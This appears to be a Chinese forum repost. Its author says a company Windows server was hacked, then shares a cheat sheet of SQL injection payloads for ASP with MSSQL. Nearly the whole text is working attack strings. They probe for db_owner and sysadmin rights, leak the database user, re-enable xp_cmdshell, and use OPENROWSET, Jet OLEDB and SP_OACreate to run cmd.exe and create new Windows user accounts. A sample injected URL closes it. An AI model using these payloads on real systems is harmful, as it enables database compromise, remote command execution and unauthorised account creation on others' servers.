最近公司的Windows Server遭Hack 變更首頁...經檢查Log發現手法跟這篇內容很神似...轉貼上來參考!!! 註:以下語法範例適用環境為[ ASP + MSSQL ]。
//檢測是否為db_owner權限
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
//檢測是否有讀取master的權限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
數字類型
and char(124)%2Buser%2Bchar(124)=0
字元類型
' and char(124)%2Buser%2Bchar(124)=0 and ''='
搜索類型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
洩漏使用者名
and user>0
' and user>0 and ''='
檢測是否為SA權限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
檢測是不是MSSQL資料庫
and exists (select * from sysobjects);--
檢測是否支持多行
;declare @d int;--
恢復 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
然後利用jet.oledb執行系統命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
執行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
判斷xp_cmdshell是否存在:
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
